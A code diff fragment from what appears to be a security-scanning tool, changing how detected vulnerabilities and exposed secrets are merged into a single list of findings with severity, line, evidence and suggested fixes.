             critical: result.summary.critical,
             high: result.summary.high,
             medium: result.summary.medium,
-            low: result.summary.low,
           };
 
-          const findings = result.findings.map(f => ({
-            type: f.type,
-            severity: f.severity,
-            message: f.message,
-            line: f.line,
-            evidence: f.evidence,
-            fix: f.fix,
-          }));
+          // Combine vulnerabilities and secrets
+          const allFindings = [
+            ...result.vulnerabilities.map(v => ({
+              type: v.category,
+              severity: v.severity,
+              message: `${v.finding} vulnerability detected`,
+              line: v.location.line,
+              evidence: v.evidence.filter(e => e.line).map(e => `${e.type} at line ${e.line}`).join(', ') || 'No evidence',
+              fix: 'Use proper sanitization (parameterized queries, input validation, etc.)',
+            })),
+            ...result.secrets.map(s => ({
+              type: 'secret',
+              severity: 'high',
+              message: `${s.type} detected`,
+              line: s.line,
+              evidence: s.match,
+              fix: 'Use environment variables',
+            }))
+          ];
+          
+          const findings = allFindings;
 
           return {
             content: [